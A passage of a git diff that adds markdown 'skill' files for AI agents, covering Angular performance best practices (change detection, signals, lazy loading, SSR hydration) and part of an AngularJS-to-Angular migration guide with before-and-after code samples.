- ❌ **Don't:** Perform expensive operations (like sorting a list) directly inside the Composable function body without `remember`.
|
||||
- ❌ **Don't:** Pass `ViewModel` instances down to child components. Pass only the data (state) and lambda callbacks (events).
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
**Problem:** Infinite Recomposition loop.
|
||||
**Solution:** Check if you are creating new object instances (like `List` or `Modifier`) inside the composition without `remember`, or if you are updating state inside the composition phase instead of a side-effect or callback. Use Layout Inspector to debug recomposition counts.
|
||||
58
packages/llm/skills/angular-best-practices/README.md
Normal file
58
packages/llm/skills/angular-best-practices/README.md
Normal file
@ -0,0 +1,58 @@
|
||||
# Angular Best Practices
|
||||
|
||||
Performance optimization and best practices for Angular applications optimized for AI agents and LLMs.
|
||||
|
||||
## Overview
|
||||
|
||||
This skill provides prioritized performance guidelines across:
|
||||
|
||||
- **Change Detection** - OnPush strategy, Signals, Zoneless apps
|
||||
- **Async Operations** - Avoiding waterfalls, SSR preloading
|
||||
- **Bundle Optimization** - Lazy loading, `@defer`, tree-shaking
|
||||
- **Rendering Performance** - TrackBy, virtual scrolling, CDK
|
||||
- **SSR & Hydration** - Server-side rendering patterns
|
||||
- **Template Optimization** - Structural directives, pipe memoization
|
||||
- **State Management** - Efficient reactivity patterns
|
||||
- **Memory Management** - Subscription cleanup, detached refs
|
||||
|
||||
## Structure
|
||||
|
||||
The `SKILL.md` file is organized by priority:
|
||||
|
||||
1. **Critical Priority** - Largest performance gains (change detection, async)
|
||||
2. **High Priority** - Significant impact (bundles, rendering)
|
||||
3. **Medium Priority** - Noticeable improvements (SSR, templates)
|
||||
4. **Low Priority** - Incremental gains (memory, cleanup)
|
||||
|
||||
Each rule includes:
|
||||
|
||||
- ❌ **WRONG** - What not to do
|
||||
- ✅ **CORRECT** - Recommended pattern
|
||||
- 📝 **Why** - Explanation of the impact
|
||||
|
||||
## Quick Reference Checklist
|
||||
|
||||
**For New Components:**
|
||||
|
||||
- [ ] Using `ChangeDetectionStrategy.OnPush`
|
||||
- [ ] Using Signals for reactive state
|
||||
- [ ] Using `@defer` for non-critical content
|
||||
- [ ] Using `trackBy` for `*ngFor` loops
|
||||
- [ ] No subscriptions without cleanup
|
||||
|
||||
**For Performance Reviews:**
|
||||
|
||||
- [ ] No async waterfalls (parallel data fetching)
|
||||
- [ ] Routes lazy-loaded
|
||||
- [ ] Large libraries code-split
|
||||
- [ ] Images use `NgOptimizedImage`
|
||||
|
||||
## Version
|
||||
|
||||
Current version: 1.0.0 (February 2026)
|
||||
|
||||
## References
|
||||
|
||||
- [Angular Performance](https://angular.dev/guide/performance)
|
||||
- [Zoneless Angular](https://angular.dev/guide/zoneless)
|
||||
- [Angular SSR](https://angular.dev/guide/ssr)
|
||||
563
packages/llm/skills/angular-best-practices/SKILL.md
Normal file
563
packages/llm/skills/angular-best-practices/SKILL.md
Normal file
@ -0,0 +1,563 @@
|
||||
---
|
||||
name: angular-best-practices
|
||||
description: "Angular performance optimization and best practices guide. Use when writing, reviewing, or refactoring Angular code for optimal performance, bundle size, and rendering efficiency."
|
||||
risk: safe
|
||||
source: self
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Angular Best Practices
|
||||
|
||||
Comprehensive performance optimization guide for Angular applications. Contains prioritized rules for eliminating performance bottlenecks, optimizing bundles, and improving rendering.
|
||||
|
||||
## When to Apply
|
||||
|
||||
Reference these guidelines when:
|
||||
|
||||
- Writing new Angular components or pages
|
||||
- Implementing data fetching patterns
|
||||
- Reviewing code for performance issues
|
||||
- Refactoring existing Angular code
|
||||
- Optimizing bundle size or load times
|
||||
- Configuring SSR/hydration
|
||||
|
||||
---
|
||||
|
||||
## Rule Categories by Priority
|
||||
|
||||
| Priority | Category | Impact | Focus |
|
||||
| -------- | --------------------- | ---------- | ------------------------------- |
|
||||
| 1 | Change Detection | CRITICAL | Signals, OnPush, Zoneless |
|
||||
| 2 | Async Waterfalls | CRITICAL | RxJS patterns, SSR preloading |
|
||||
| 3 | Bundle Optimization | CRITICAL | Lazy loading, tree shaking |
|
||||
| 4 | Rendering Performance | HIGH | @defer, trackBy, virtualization |
|
||||
| 5 | Server-Side Rendering | HIGH | Hydration, prerendering |
|
||||
| 6 | Template Optimization | MEDIUM | Control flow, pipes |
|
||||
| 7 | State Management | MEDIUM | Signal patterns, selectors |
|
||||
| 8 | Memory Management | LOW-MEDIUM | Cleanup, subscriptions |
|
||||
|
||||
---
|
||||
|
||||
## 1. Change Detection (CRITICAL)
|
||||
|
||||
### Use OnPush Change Detection
|
||||
|
||||
```typescript
|
||||
// CORRECT - OnPush with Signals
|
||||
@Component({
|
||||
changeDetection: ChangeDetectionStrategy.OnPush,
|
||||
template: `<div>{{ count() }}</div>`,
|
||||
})
|
||||
export class CounterComponent {
|
||||
count = signal(0);
|
||||
}
|
||||
|
||||
// WRONG - Default change detection
|
||||
@Component({
|
||||
template: `<div>{{ count }}</div>`, // Checked every cycle
|
||||
})
|
||||
export class CounterComponent {
|
||||
count = 0;
|
||||
}
|
||||
```
|
||||
|
||||
### Prefer Signals Over Mutable Properties
|
||||
|
||||
```typescript
|
||||
// CORRECT - Signals trigger precise updates
|
||||
@Component({
|
||||
template: `
|
||||
<h1>{{ title() }}</h1>
|
||||
<p>Count: {{ count() }}</p>
|
||||
`,
|
||||
})
|
||||
export class DashboardComponent {
|
||||
title = signal("Dashboard");
|
||||
count = signal(0);
|
||||
}
|
||||
|
||||
// WRONG - Mutable properties require zone.js checks
|
||||
@Component({
|
||||
template: `
|
||||
<h1>{{ title }}</h1>
|
||||
<p>Count: {{ count }}</p>
|
||||
`,
|
||||
})
|
||||
export class DashboardComponent {
|
||||
title = "Dashboard";
|
||||
count = 0;
|
||||
}
|
||||
```
|
||||
|
||||
### Enable Zoneless for New Projects
|
||||
|
||||
```typescript
|
||||
// main.ts - Zoneless Angular (v20+)
|
||||
bootstrapApplication(AppComponent, {
|
||||
providers: [provideZonelessChangeDetection()],
|
||||
});
|
||||
```
|
||||
|
||||
**Benefits:**
|
||||
|
||||
- No zone.js patches on async APIs
|
||||
- Smaller bundle (~15KB savings)
|
||||
- Clean stack traces for debugging
|
||||
- Better micro-frontend compatibility
|
||||
|
||||
---
|
||||
|
||||
## 2. Async Operations & Waterfalls (CRITICAL)
|
||||
|
||||
### Eliminate Sequential Data Fetching
|
||||
|
||||
```typescript
|
||||
// WRONG - Nested subscriptions create waterfalls
|
||||
this.route.params.subscribe((params) => {
|
||||
// 1. Wait for params
|
||||
this.userService.getUser(params.id).subscribe((user) => {
|
||||
// 2. Wait for user
|
||||
this.postsService.getPosts(user.id).subscribe((posts) => {
|
||||
// 3. Wait for posts
|
||||
});
|
||||
});
|
||||
});
|
||||
|
||||
// CORRECT - Parallel execution with forkJoin
|
||||
forkJoin({
|
||||
user: this.userService.getUser(id),
|
||||
posts: this.postsService.getPosts(id),
|
||||
}).subscribe((data) => {
|
||||
// Fetched in parallel
|
||||
});
|
||||
|
||||
// CORRECT - Flatten dependent calls with switchMap
|
||||
this.route.params
|
||||
.pipe(
|
||||
map((p) => p.id),
|
||||
switchMap((id) => this.userService.getUser(id)),
|
||||
)
|
||||
.subscribe();
|
||||
```
|
||||
|
||||
### Avoid Client-Side Waterfalls in SSR
|
||||
|
||||
```typescript
|
||||
// CORRECT - Use resolvers or blocking hydration for critical data
|
||||
export const route: Route = {
|
||||
path: "profile/:id",
|
||||
resolve: { data: profileResolver }, // Fetched on server before navigation
|
||||
component: ProfileComponent,
|
||||
};
|
||||
|
||||
// WRONG - Component fetches data on init
|
||||
class ProfileComponent implements OnInit {
|
||||
ngOnInit() {
|
||||
// Starts ONLY after JS loads and component renders
|
||||
this.http.get("/api/profile").subscribe();
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Bundle Optimization (CRITICAL)
|
||||
|
||||
### Lazy Load Routes
|
||||
|
||||
```typescript
|
||||
// CORRECT - Lazy load feature routes
|
||||
export const routes: Routes = [
|
||||
{
|
||||
path: "admin",
|
||||
loadChildren: () =>
|
||||
import("./admin/admin.routes").then((m) => m.ADMIN_ROUTES),
|
||||
},
|
||||
{
|
||||
path: "dashboard",
|
||||
loadComponent: () =>
|
||||
import("./dashboard/dashboard.component").then(
|
||||
(m) => m.DashboardComponent,
|
||||
),
|
||||
},
|
||||
];
|
||||
|
||||
// WRONG - Eager loading everything
|
||||
import { AdminModule } from "./admin/admin.module";
|
||||
export const routes: Routes = [
|
||||
{ path: "admin", component: AdminComponent }, // In main bundle
|
||||
];
|
||||
```
|
||||
|
||||
### Use @defer for Heavy Components
|
||||
|
||||
```html
|
||||
<!-- CORRECT - Heavy component loads on demand -->
|
||||
@defer (on viewport) {
|
||||
<app-analytics-chart [data]="data()" />
|
||||
} @placeholder {
|
||||
<div class="chart-skeleton"></div>
|
||||
}
|
||||
|
||||
<!-- WRONG - Heavy component in initial bundle -->
|
||||
<app-analytics-chart [data]="data()" />
|
||||
```
|
||||
|
||||
### Avoid Barrel File Re-exports
|
||||
|
||||
```typescript
|
||||
// WRONG - Imports entire barrel, breaks tree-shaking
|
||||
import { Button, Modal, Table } from "@shared/components";
|
||||
|
||||
// CORRECT - Direct imports
|
||||
import { Button } from "@shared/components/button/button.component";
|
||||
import { Modal } from "@shared/components/modal/modal.component";
|
||||
```
|
||||
|
||||
### Dynamic Import Third-Party Libraries
|
||||
|
||||
```typescript
|
||||
// CORRECT - Load heavy library on demand
|
||||
async loadChart() {
|
||||
const { Chart } = await import('chart.js');
|
||||
this.chart = new Chart(this.canvas, config);
|
||||
}
|
||||
|
||||
// WRONG - Bundle Chart.js in main chunk
|
||||
import { Chart } from 'chart.js';
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. Rendering Performance (HIGH)
|
||||
|
||||
### Always Use trackBy with @for
|
||||
|
||||
```html
|
||||
<!-- CORRECT - Efficient DOM updates -->
|
||||
@for (item of items(); track item.id) {
|
||||
<app-item-card [item]="item" />
|
||||
}
|
||||
|
||||
<!-- WRONG - Entire list re-renders on any change -->
|
||||
@for (item of items(); track $index) {
|
||||
<app-item-card [item]="item" />
|
||||
}
|
||||
```
|
||||
|
||||
### Use Virtual Scrolling for Large Lists
|
||||
|
||||
```typescript
|
||||
import { CdkVirtualScrollViewport, CdkFixedSizeVirtualScroll } from '@angular/cdk/scrolling';
|
||||
|
||||
@Component({
|
||||
imports: [CdkVirtualScrollViewport, CdkFixedSizeVirtualScroll],
|
||||
template: `
|
||||
<cdk-virtual-scroll-viewport itemSize="50" class="viewport">
|
||||
<div *cdkVirtualFor="let item of items" class="item">
|
||||
{{ item.name }}
|
||||
</div>
|
||||
</cdk-virtual-scroll-viewport>
|
||||
`
|
||||
})
|
||||
```
|
||||
|
||||
### Prefer Pure Pipes Over Methods
|
||||
|
||||
```typescript
|
||||
// CORRECT - Pure pipe, memoized
|
||||
@Pipe({ name: 'filterActive', standalone: true, pure: true })
|
||||
export class FilterActivePipe implements PipeTransform {
|
||||
transform(items: Item[]): Item[] {
|
||||
return items.filter(i => i.active);
|
||||
}
|
||||
}
|
||||
|
||||
// Template
|
||||
@for (item of items() | filterActive; track item.id) { ... }
|
||||
|
||||
// WRONG - Method called every change detection
|
||||
@for (item of getActiveItems(); track item.id) { ... }
|
||||
```
|
||||
|
||||
### Use computed() for Derived Data
|
||||
|
||||
```typescript
|
||||
// CORRECT - Computed, cached until dependencies change
|
||||
export class ProductStore {
|
||||
products = signal<Product[]>([]);
|
||||
filter = signal('');
|
||||
|
||||
filteredProducts = computed(() => {
|
||||
const f = this.filter().toLowerCase();
|
||||
return this.products().filter(p =>
|
||||
p.name.toLowerCase().includes(f)
|
||||
);
|
||||
});
|
||||
}
|
||||
|
||||
// WRONG - Recalculates every access
|
||||
get filteredProducts() {
|
||||
return this.products.filter(p =>
|
||||
p.name.toLowerCase().includes(this.filter)
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. Server-Side Rendering (HIGH)
|
||||
|
||||
### Configure Incremental Hydration
|
||||
|
||||
```typescript
|
||||
// app.config.ts
|
||||
import {
|
||||
provideClientHydration,
|
||||
withIncrementalHydration,
|
||||
} from "@angular/platform-browser";
|
||||
|
||||
export const appConfig: ApplicationConfig = {
|
||||
providers: [
|
||||
provideClientHydration(withIncrementalHydration(), withEventReplay()),
|
||||
],
|
||||
};
|
||||
```
|
||||
|
||||
### Defer Non-Critical Content
|
||||
|
||||
```html
|
||||
<!-- Critical above-the-fold content -->
|
||||
<app-header />
|
||||
<app-hero />
|
||||
|
||||
<!-- Below-fold deferred with hydration triggers -->
|
||||
@defer (hydrate on viewport) {
|
||||
<app-product-grid />
|
||||
} @defer (hydrate on interaction) {
|
||||
<app-chat-widget />
|
||||
}
|
||||
```
|
||||
|
||||
### Use TransferState for SSR Data
|
||||
|
||||
```typescript
|
||||
@Injectable({ providedIn: "root" })
|
||||
export class DataService {
|
||||
private http = inject(HttpClient);
|
||||
private transferState = inject(TransferState);
|
||||
private platformId = inject(PLATFORM_ID);
|
||||
|
||||
getData(key: string): Observable<Data> {
|
||||
const stateKey = makeStateKey<Data>(key);
|
||||
|
||||
if (isPlatformBrowser(this.platformId)) {
|
||||
const cached = this.transferState.get(stateKey, null);
|
||||
if (cached) {
|
||||
this.transferState.remove(stateKey);
|
||||
return of(cached);
|
||||
}
|
||||
}
|
||||
|
||||
return this.http.get<Data>(`/api/${key}`).pipe(
|
||||
tap((data) => {
|
||||
if (isPlatformServer(this.platformId)) {
|
||||
this.transferState.set(stateKey, data);
|
||||
}
|
||||
}),
|
||||
);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. Template Optimization (MEDIUM)
|
||||
|
||||
### Use New Control Flow Syntax
|
||||
|
||||
```html
|
||||
<!-- CORRECT - New control flow (faster, smaller bundle) -->
|
||||
@if (user()) {
|
||||
<span>{{ user()!.name }}</span>
|
||||
} @else {
|
||||
<span>Guest</span>
|
||||
} @for (item of items(); track item.id) {
|
||||
<app-item [item]="item" />
|
||||
} @empty {
|
||||
<p>No items</p>
|
||||
}
|
||||
|
||||
<!-- WRONG - Legacy structural directives -->
|
||||
<span *ngIf="user; else guest">{{ user.name }}</span>
|
||||
<ng-template #guest><span>Guest</span></ng-template>
|
||||
```
|
||||
|
||||
### Avoid Complex Template Expressions
|
||||
|
||||
```typescript
|
||||
// CORRECT - Precompute in component
|
||||
class Component {
|
||||
items = signal<Item[]>([]);
|
||||
sortedItems = computed(() =>
|
||||
[...this.items()].sort((a, b) => a.name.localeCompare(b.name))
|
||||
);
|
||||
}
|
||||
|
||||
// Template
|
||||
@for (item of sortedItems(); track item.id) { ... }
|
||||
|
||||
// WRONG - Sorting in template every render
|
||||
@for (item of items() | sort:'name'; track item.id) { ... }
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 7. State Management (MEDIUM)
|
||||
|
||||
### Use Selectors to Prevent Re-renders
|
||||
|
||||
```typescript
|
||||
// CORRECT - Selective subscription
|
||||
@Component({
|
||||
template: `<span>{{ userName() }}</span>`,
|
||||
})
|
||||
class HeaderComponent {
|
||||
private store = inject(Store);
|
||||
// Only re-renders when userName changes
|
||||
userName = this.store.selectSignal(selectUserName);
|
||||
}
|
||||
|
||||
// WRONG - Subscribing to entire state
|
||||
@Component({
|
||||
template: `<span>{{ state().user.name }}</span>`,
|
||||
})
|
||||
class HeaderComponent {
|
||||
private store = inject(Store);
|
||||
// Re-renders on ANY state change
|
||||
state = toSignal(this.store);
|
||||
}
|
||||
```
|
||||
|
||||
### Colocate State with Features
|
||||
|
||||
```typescript
|
||||
// CORRECT - Feature-scoped store
|
||||
@Injectable() // NOT providedIn: 'root'
|
||||
export class ProductStore { ... }
|
||||
|
||||
@Component({
|
||||
providers: [ProductStore], // Scoped to component tree
|
||||
})
|
||||
export class ProductPageComponent {
|
||||
store = inject(ProductStore);
|
||||
}
|
||||
|
||||
// WRONG - Everything in global store
|
||||
@Injectable({ providedIn: 'root' })
|
||||
export class GlobalStore {
|
||||
// Contains ALL app state - hard to tree-shake
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 8. Memory Management (LOW-MEDIUM)
|
||||
|
||||
### Use takeUntilDestroyed for Subscriptions
|
||||
|
||||
```typescript
|
||||
import { takeUntilDestroyed } from '@angular/core/rxjs-interop';
|
||||
|
||||
@Component({...})
|
||||
export class DataComponent {
|
||||
private destroyRef = inject(DestroyRef);
|
||||
|
||||
constructor() {
|
||||
this.data$.pipe(
|
||||
takeUntilDestroyed(this.destroyRef)
|
||||
).subscribe(data => this.process(data));
|
||||
}
|
||||
}
|
||||
|
||||
// WRONG - Manual subscription management
|
||||
export class DataComponent implements OnDestroy {
|
||||
private subscription!: Subscription;
|
||||
|
||||
ngOnInit() {
|
||||
this.subscription = this.data$.subscribe(...);
|
||||
}
|
||||
|
||||
ngOnDestroy() {
|
||||
this.subscription.unsubscribe(); // Easy to forget
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Prefer Signals Over Subscriptions
|
||||
|
||||
```typescript
|
||||
// CORRECT - No subscription needed
|
||||
@Component({
|
||||
template: `<div>{{ data().name }}</div>`,
|
||||
})
|
||||
export class Component {
|
||||
data = toSignal(this.service.data$, { initialValue: null });
|
||||
}
|
||||
|
||||
// WRONG - Manual subscription
|
||||
@Component({
|
||||
template: `<div>{{ data?.name }}</div>`,
|
||||
})
|
||||
export class Component implements OnInit, OnDestroy {
|
||||
data: Data | null = null;
|
||||
private sub!: Subscription;
|
||||
|
||||
ngOnInit() {
|
||||
this.sub = this.service.data$.subscribe((d) => (this.data = d));
|
||||
}
|
||||
|
||||
ngOnDestroy() {
|
||||
this.sub.unsubscribe();
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Quick Reference Checklist
|
||||
|
||||
### New Component
|
||||
|
||||
- [ ] `changeDetection: ChangeDetectionStrategy.OnPush`
|
||||
- [ ] `standalone: true`
|
||||
- [ ] Signals for state (`signal()`, `input()`, `output()`)
|
||||
- [ ] `inject()` for dependencies
|
||||
- [ ] `@for` with `track` expression
|
||||
|
||||
### Performance Review
|
||||
|
||||
- [ ] No methods in templates (use pipes or computed)
|
||||
- [ ] Large lists virtualized
|
||||
- [ ] Heavy components deferred
|
||||
- [ ] Routes lazy-loaded
|
||||
- [ ] Third-party libs dynamically imported
|
||||
|
||||
### SSR Check
|
||||
|
||||
- [ ] Hydration configured
|
||||
- [ ] Critical content renders first
|
||||
- [ ] Non-critical content uses `@defer (hydrate on ...)`
|
||||
- [ ] TransferState for server-fetched data
|
||||
|
||||
---
|
||||
|
||||
## Resources
|
||||
|
||||
- [Angular Performance Guide](https://angular.dev/best-practices/performance)
|
||||
- [Zoneless Angular](https://angular.dev/guide/experimental/zoneless)
|
||||
- [Angular SSR Guide](https://angular.dev/guide/ssr)
|
||||
- [Change Detection Deep Dive](https://angular.dev/guide/change-detection)
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
13
packages/llm/skills/angular-best-practices/metadata.json
Normal file
13
packages/llm/skills/angular-best-practices/metadata.json
Normal file
@ -0,0 +1,13 @@
|
||||
{
|
||||
"version": "1.0.0",
|
||||
"organization": "Antigravity Awesome Skills",
|
||||
"date": "February 2026",
|
||||
"abstract": "Performance optimization and best practices guide for Angular applications designed for AI agents and LLMs. Covers change detection strategies (OnPush, Signals, Zoneless), avoiding async waterfalls, bundle optimization with lazy loading and @defer, rendering performance, SSR/hydration patterns, and memory management. Prioritized by impact from critical to incremental improvements.",
|
||||
"references": [
|
||||
"https://angular.dev/best-practices",
|
||||
"https://angular.dev/guide/performance",
|
||||
"https://angular.dev/guide/zoneless",
|
||||
"https://angular.dev/guide/ssr",
|
||||
"https://web.dev/performance"
|
||||
]
|
||||
}
|
||||
431
packages/llm/skills/angular-migration/SKILL.md
Normal file
431
packages/llm/skills/angular-migration/SKILL.md
Normal file
@ -0,0 +1,431 @@
|
||||
---
|
||||
name: angular-migration
|
||||
description: "Migrate from AngularJS to Angular using hybrid mode, incremental component rewriting, and dependency injection updates. Use when upgrading AngularJS applications, planning framework migrations, or ..."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Angular Migration
|
||||
|
||||
Master AngularJS to Angular migration, including hybrid apps, component conversion, dependency injection changes, and routing migration.
|
||||
|
||||
## Use this skill when
|
||||
|
||||
- Migrating AngularJS (1.x) applications to Angular (2+)
|
||||
- Running hybrid AngularJS/Angular applications
|
||||
- Converting directives to components
|
||||
- Modernizing dependency injection
|
||||
- Migrating routing systems
|
||||
- Updating to latest Angular versions
|
||||
- Implementing Angular best practices
|
||||
|
||||
## Do not use this skill when
|
||||
|
||||
- You are not migrating from AngularJS to Angular
|
||||
- The app is already on a modern Angular version
|
||||
- You need only a small UI fix without framework changes
|
||||
|
||||
## Instructions
|
||||
|
||||
1. Assess the AngularJS codebase, dependencies, and migration risks.
|
||||
2. Choose a migration strategy (hybrid vs rewrite) and define milestones.
|
||||
3. Set up ngUpgrade and migrate modules, components, and routing.
|
||||
4. Validate with tests and plan a safe cutover.
|
||||
|
||||
## Safety
|
||||
|
||||
- Avoid big-bang cutovers without rollback and staging validation.
|
||||
- Keep hybrid compatibility testing during incremental migration.
|
||||
|
||||
## Migration Strategies
|
||||
|
||||
### 1. Big Bang (Complete Rewrite)
|
||||
- Rewrite entire app in Angular
|
||||
- Parallel development
|
||||
- Switch over at once
|
||||
- **Best for:** Small apps, green field projects
|
||||
|
||||
### 2. Incremental (Hybrid Approach)
|
||||
- Run AngularJS and Angular side-by-side
|
||||
- Migrate feature by feature
|
||||
- ngUpgrade for interop
|
||||
- **Best for:** Large apps, continuous delivery
|
||||
|
||||
### 3. Vertical Slice
|
||||
- Migrate one feature completely
|
||||
- New features in Angular, maintain old in AngularJS
|
||||
- Gradually replace
|
||||
- **Best for:** Medium apps, distinct features
|
||||
|
||||
## Hybrid App Setup
|
||||
|
||||
```typescript
|
||||
// main.ts - Bootstrap hybrid app
|
||||
import { platformBrowserDynamic } from '@angular/platform-browser-dynamic';
|
||||
import { UpgradeModule } from '@angular/upgrade/static';
|
||||
import { AppModule } from './app/app.module';
|
||||
|
||||
platformBrowserDynamic()
|
||||
.bootstrapModule(AppModule)
|
||||
.then(platformRef => {
|
||||
const upgrade = platformRef.injector.get(UpgradeModule);
|
||||
// Bootstrap AngularJS
|
||||
upgrade.bootstrap(document.body, ['myAngularJSApp'], { strictDi: true });
|
||||
});
|
||||
```
|
||||
|
||||
```typescript
|
||||
// app.module.ts
|
||||
import { NgModule } from '@angular/core';
|
||||
import { BrowserModule } from '@angular/platform-browser';
|
||||
import { UpgradeModule } from '@angular/upgrade/static';
|
||||
|
||||
@NgModule({
|
||||
imports: [
|
||||
BrowserModule,
|
||||
UpgradeModule
|
||||
]
|
||||
})
|
||||
export class AppModule {
|
||||
constructor(private upgrade: UpgradeModule) {}
|
||||
|
||||
ngDoBootstrap() {
|
||||
// Bootstrapped manually in main.ts
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Component Migration
|
||||
|
||||
### AngularJS Controller → Angular Component
|
||||
```javascript
|
||||
// Before: AngularJS controller
|
||||
angular.module('myApp').controller('UserController', function($scope, UserService) {
|
||||
$scope.user = {};
|
||||
|
||||
$scope.loadUser = function(id) {
|
||||
UserService.getUser(id).then(function(user) {
|
||||
$scope.user = user;
|
||||
});
|
||||
};
|
||||
|
||||
$scope.saveUser = function() {
|
||||
UserService.saveUser($scope.user);
|
||||
};
|
||||
});
|
||||
```
|
||||
|
||||
```typescript
|
||||
// After: Angular component
|
||||
import { Component, OnInit } from '@angular/core';
|
||||
import { UserService } from './user.service';
|
||||
|
||||
@Component({
|
||||
selector: 'app-user',
|
||||
template: `
|
||||
<div>
|
||||
<h2>{{ user.name }}</h2>
|
||||
<button (click)="saveUser()">Save</button>
|
||||
</div>
|
||||
`
|
||||
})
|
||||
export class UserComponent implements OnInit {
|
||||
user: any = {};
|
||||
|
||||
constructor(private userService: UserService) {}
|
||||
|
||||
ngOnInit() {
|
||||
this.loadUser(1);
|
||||
}
|
||||
|
||||
loadUser(id: number) {
|
||||
this.userService.getUser(id).subscribe(user => {
|
||||
this.user = user;
|
||||
});
|
||||
}
|
||||
|
||||
saveUser() {
|
||||
this.userService.saveUser(this.user);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### AngularJS Directive → Angular Component
|
||||
```javascript
|
||||
// Before: AngularJS directive
|
||||
angular.module('myApp').directive('userCard', function() {
|
||||
return {
|
||||
restrict: 'E',
|
||||
scope: {
|
||||
user: '=',
|
||||
onDelete: '&'
|
||||
},
|
||||
template: `
|
||||
<div class="card">
|
||||
<h3>{{ user.name }}</h3>
|
||||
<button ng-click="onDelete()">Delete</button>
|
||||
</div>
|
||||
`
|
||||
};
|
||||
});
|
||||
```
|
||||
|
||||
```typescript
|
||||
// After: Angular component
|
||||
import { Component, Input, Output, EventEmitter } from '@angular/core';
|
||||
|
||||
@Component({
|
||||
selector: 'app-user-card',
|
||||
template: `
|
||||
<div class="card">
|
||||
<h3>{{ user.name }}</h3>
|
||||
<button (click)="delete.emit()">Delete</button>
|
||||
</div>
|
||||
`
|
||||
})
|
||||
export class UserCardComponent {
|
||||
@Input() user: any;
|
||||
@Output() delete = new EventEmitter<void>();
|
||||
}
|
||||
|
||||
// Usage: <app-user-card [user]="user" (delete)="handleDelete()"></app-user-card>
|
||||
```
|
||||
|
||||
## Service Migration
|
||||
|
||||
```javascript
|
||||
// Before: AngularJS service
|
||||
angular.module('myApp').factory('UserService', function($http) {
|
||||
return {
|
||||
getUser: function(id) {
|
||||
return $http.get('/api/users/' + id);
|
||||
},
|
||||
saveUser: function(user) {
|
||||
return $http.post('/api/users', user);
|
||||
}
|
||||
};
|
||||
});
|
||||
```
|
||||
|
||||
```typescript
|
||||
// After: Angular service
|
||||
import { Injectable } from '@angular/core';
|
||||
import { HttpClient } from '@angular/common/http';
|
||||
import { Observable } from 'rxjs';
|
||||
|
||||
@Injectable({
|
||||
providedIn: 'root'
|
||||
})
|
||||
export class UserService {
|
||||
constructor(private http: HttpClient) {}
|
||||
|
||||
getUser(id: number): Observable<any> {
|
||||
return this.http.get(`/api/users/${id}`);
|
||||
}
|
||||
|
||||
saveUser(user: any): Observable<any> {
|
||||
return this.http.post('/api/users', user);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Dependency Injection Changes
|
||||
|
||||
### Downgrading Angular → AngularJS
|
||||
```typescript
|
||||
// Angular service
|
||||
import { Injectable } from '@angular/core';
|
||||
|
||||
@Injectable({ providedIn: 'root' })
|
||||
export class NewService {
|
||||
getData() {
|
||||
return 'data from Angular';
|
||||
}
|
||||
}
|
||||
|
||||
// Make available to AngularJS
|
||||
import { downgradeInjectable } from '@angular/upgrade/static';
|
||||
|
||||
angular.module('myApp')
|
||||
.factory('newService', downgradeInjectable(NewService));
|
||||
|
||||
// Use in AngularJS
|
||||
angular.module('myApp').controller('OldController', function(newService) {
|
||||
console.log(newService.getData());
|
||||
});
|
||||
```
|
||||
|
||||
### Upgrading AngularJS → Angular
|
||||
```typescript
|
||||
// AngularJS service
|
||||
angular.module('myApp').factory('oldService', function() {
|
||||
return {
|
||||
getData: function() {
|
||||
return 'data from AngularJS';
|
||||
}
|
||||
};
|
||||
});
|
||||
|
||||
// Make available to Angular
|
||||
import { InjectionToken } from '@angular/core';
|
||||
|
||||
export const OLD_SERVICE = new InjectionToken<any>('oldService');
|
||||
|
||||
@NgModule({
|
||||
providers: [
|
||||
{
|
||||
provide: OLD_SERVICE,
|
||||
useFactory: (i: any) => i.get('oldService'),
|
||||
deps: ['$injector']
|
||||
}
|
||||
]
|
||||
})
|
||||
|
||||
// Use in Angular
|
||||
@Component({...})
|
||||
export class NewComponent {
|
||||
constructor(@Inject(OLD_SERVICE) private oldService: any) {
|
||||
console.log(this.oldService.getData());
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Routing Migration
|
||||
|
||||
```javascript
|
||||
// Before: AngularJS routing
|
||||
angular.module('myApp').config(function($routeProvider) {
|
||||
$routeProvider
|
||||
.when('/users', {
|
||||
template: '<user-list></user-list>'
|
||||
})
|
||||
.when('/users/:id', {
|
||||
template: '<user-detail></user-detail>'
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
```typescript
|
||||
// After: Angular routing
|
||||
import { NgModule } from '@angular/core';
|
||||
import { RouterModule, Routes } from '@angular/router';
|
||||
|
||||
const routes: Routes = [
|
||||
{ path: 'users', component: UserListComponent },
|
||||
{ path: 'users/:id', component: UserDetailComponent }
|
||||
];
|
||||
|
||||
@NgModule({
|
||||
imports: [RouterModule.forRoot(routes)],
|
||||
exports: [RouterModule]
|
||||
})
|
||||
export class AppRoutingModule {}
|
||||
```
|
||||
|
||||
## Forms Migration
|
||||
|
||||
```html
|
||||
<!-- Before: AngularJS -->
|
||||
<form name="userForm" ng-submit="saveUser()">
|
||||
<input type="text" ng-model="user.name" required>
|
||||
<input type="email" ng-model="user.email" required>
|
||||
<button ng-disabled="userForm.$invalid">Save</button>
|
||||
</form>
|
||||
```
|
||||
|
||||
```typescript
|
||||
// After: Angular (Template-driven)
|
||||
@Component({
|
||||
template: `
|
||||
<form #userForm="ngForm" (ngSubmit)="saveUser()">
|
||||
<input type="text" [(ngModel)]="user.name" name="name" required>
|
||||
<input type="email" [(ngModel)]="user.email" name="email" required>
|
||||
<button [disabled]="userForm.invalid">Save</button>
|
||||
</form>
|
||||
`
|
||||
})
|
||||
|
||||
// Or Reactive Forms (preferred)
|
||||
